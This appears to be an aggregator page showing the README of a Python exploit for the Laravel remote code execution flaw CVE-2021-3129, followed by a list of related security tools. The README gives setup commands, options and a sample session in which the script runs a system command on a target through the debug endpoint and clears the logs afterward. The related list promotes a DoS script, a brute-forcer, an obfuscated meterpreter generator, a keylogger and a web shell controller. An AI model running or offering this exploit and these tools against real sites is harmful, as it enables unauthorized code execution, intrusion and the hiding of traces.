Laravel RCE (CVE-2021-3129)

Related tags

Security related resourcesCVE-2021-3129
Overview

CVE-2021-3129 - Laravel RCE

About

The script has been made for exploiting the Laravel RCE (CVE-2021-3129) vulnerability.
This script allows you to write/execute commands on a website running Laravel <= v8.4.2, that has "APP_DEBUG" set to "true" in its ".env" file.

It currently has support for searching the log file, executing commands, writing to the log file, and support for clearing log files.

Setup

$ git clone https://github.com/joshuavanderpoll/CVE-2021-3129.git
$ cd CVE-2021-3129
# pip install -r requirements.txt
# python3 CVE-2021-3129.py --help

Options

usage: CVE-2021-3129.py [-h] [--host HOST] [--force] [--log LOG] [--ua]
                        [--chain CHAIN] [--chains]

Exploit CVE-2021-3129 - Laravel vulnerability exploit script

optional arguments:
  -h, --help     show this help message and exit
  --host HOST    Host URL to use exploit on
  --force        Force exploit without checking if vulnerable
  --log LOG      Full path to laravel.log file (e.g.
                 /var/www/html/storage/logs/laravel.log)
  --ua           Randomize User-Agent for requests
  --chain CHAIN  Select PHPGGC chain. Use "--chains" parameter to view all
                 available chains.
  --chains       View available chains for the "--chain" parameter

Example

$ python3 CVE-2021-3129.py --host http://127.0.0.1/public/
Laravel Debug Mode CVE script
[•] Made by: https://jvdpoll.nl
[@] Starting exploit on "http://127.0.0.1/public/"...
[@] Testing vulnerable URL http://127.0.0.1/public/_ignition/execute-solution...
[√] Host seems vulnerable!
[@] Searching Laravel log file path...
[•] Log path found: "/home/laravel/web/storage/logs/laravel.log"
[•] Laravel log found: "/home/laravel/web/storage/logs/laravel.log".
[•] Laravel version found: "7.22.4".
[√] Laravel log file set to "/home/laravel/web/storage/logs/laravel.log".
[•] Use "?" for a list of all possible actions.
[?] Please enter a command to execute: help
[•] Available commands:
    exit - Exit program.
    help - Shows available commands.
    clear_logs - Clears Laravel logs.
    execute <command> - Execute system command.
    write <command> - Write to log file.
[?] Please enter a command to execute: execute ls /home/laravel/web/
[@] Executing command "ls /home/laravel/web/"...
[@] Generating payload...
[√] Generated payload.
[@] Clearing logs...
[√] Cleared logs.
[@] Causing error in logs...
[√] Caused error in logs.
[@] Sending payload...
[√] Sent payload.
[@] Converting payload...
[√] Converted payload.
[√] Result:

README.md
app
artisan
bootstrap
composer.json
composer.lock
config
database
package.json
phpunit.xml
public
resources
routes
server.php
storage
tests
vendor
webpack.mix.js

[@] Clearing logs...
[√] Cleared logs.

Future:

  • Automatically determine PHPGCC chain if version detected while scanning.

Credits

Owner
Joshua van der Poll
Cyber enthousiast / Developer
Joshua van der Poll
GitHub Repository
Ensure secure infrastructure and consistency with the firewall rules

Python Port Scanner This script tries to check if it's possible to make a connection with the specific endpoint port. This is very useful to ensure se

Allan Avelar 7 Feb 26, 2022
A windows post exploitation tool that contains a lot of features for information gathering and more.

Crowbar - A windows post exploitation tool Status - ✔️ This project is now considered finished. Any updates from now on will most likely be new script

29 Nov 20, 2022
DoSer.py - Simple DoSer in Python

DoSer.py - Simple DoSer in Python What is DoSer? DoSer is basically an HTTP Denial of Service attack that affects threaded servers. It works like this

8 Sep 02, 2022
Python3 script for scanning CVE-2021-44228 (Log4shell) vulnerable machines.

Log4j_checker.py (CVE-2021-44228) Description This Python3 script tries to look for servers vulnerable to CVE-2021-44228, also known as Log4Shell, a v

lfama 8 Feb 27, 2022
Brute force attack tool for Azure AD Autologon/Seamless SSO

Brute force attack tool for Azure AD Autologon

nyxgeek 89 Jan 02, 2023
Coerce authentication from Windows hosts via MS-FSRVP (Requires FS-VSS-AGENT service running on host)

VSSTrigger Coerce authentication from Windows hosts via MS-FSRVP (Requires FS-VS

Filip Dragovic 6 Jul 24, 2022
Python library to prevent XSS(cross site scripting attach) by removing harmful content from data.

A tool for removing malicious content from input data before saving data into database. It takes input containing HTML with XSS scripts and returns va

2 Jul 05, 2022
User-friendly reference finder in IDA

IDARefHunter Updated: This project's been introduced on IDA Plugin Contest 2021! Why do we need RefHunter? Getting reference information in one specif

Jiwon 29 Dec 04, 2022
This program is a WiFi cracker, you can test many passwords for a desired wifi to find the wifi password!

WiFi_Cracker About the Program: This program is a WiFi cracker! Just run code and select a desired wifi to start cracking 💣 Note: you can use this pa

Sina.f 13 Dec 08, 2022
Evil-stalker - A simple tool written in python, it is so simple that it is based on google dorks

evil-stalker How to run First of all, you must install the necessary libraries.

rock3d 6 Nov 16, 2022
Flutter Reverse Engineering Framework

This framework helps reverse engineer Flutter apps using patched version of Flutter library which is already compiled and ready for app repacking. There are changes made to snapshot deserialization p

PT SWARM 910 Jan 01, 2023
Generate obfuscated meterpreter shells

Generator Evade AV with obfuscated payloads Installation must install dotnet prior to running the script with net45 Running ./generator.py -ip Your-I

Fawaz Al-Mutairi 219 Nov 28, 2022
The next level Python obfuscator, nearly impossible to deobfuscate.

🐸 Kramer 🐸 Kramer is a next level obfuscation tool written in Python3 allowing you to obfuscate your Python3 code easily and securely. It uses Berse

Billy 114 Dec 26, 2022
Wordlist attacks on Bitwarden data.json files

BitwardenDecryptBrute This is a slightly modified version of BitwardenDecrypt. In addition to the decryption this version can do wordlist attacks for

42 Nov 09, 2022
IDA plugin for quickly copying disassembly as encoded hex bytes

HexCopy IDA plugin for quickly copying disassembly as encoded hex bytes. This whole plugin just saves you two extra clicks... but if you are frequentl

OALabs 46 Oct 30, 2022
Script for automatic dump and brute-force passwords using Volatility Framework

Volatility-auto-hashdump Script for automatic dump and brute-force passwords using Volatility Framework

whoamins 11 Apr 11, 2022
Ingest GreyNoise.io malicious feed for CVE-2021-44228 and apply null routes

log4j-nullroute Quick script to ingest IP feed from greynoise.io for log4j (CVE-2021-44228) and null route bad addresses. Works w/Cisco IOS-XE and Ari

Ryan 5 Sep 12, 2022
A terminal based web shell controller

shell-hack Tribute to Chinese ant sword; A Powerful terminal based webshell controller; Usage : Usage : python3 shell-hack.py --url [URL] --w

s1mple 10 Dec 28, 2021
Bilgi Sistemleri Projesi için yapılan keylogger

Keylogger Bilgi Sistemleri Projesi için yapılan keylogger Projede kullanılan kütüphanelere sahip olmasanız da python dosyası çalıştığında kendisi gere

Tarik Bulut 1 Jan 07, 2022
Hacktricks - Welcome to the page where you will find each trick/technique/whatever I have learnt in CTFs, real life apps, and reading researches and news.

Hacktricks - Welcome to the page where you will find each trick/technique/whatever I have learnt in CTFs, real life apps, and reading researches and news.

Carlos Polop 5.8k Jan 07, 2023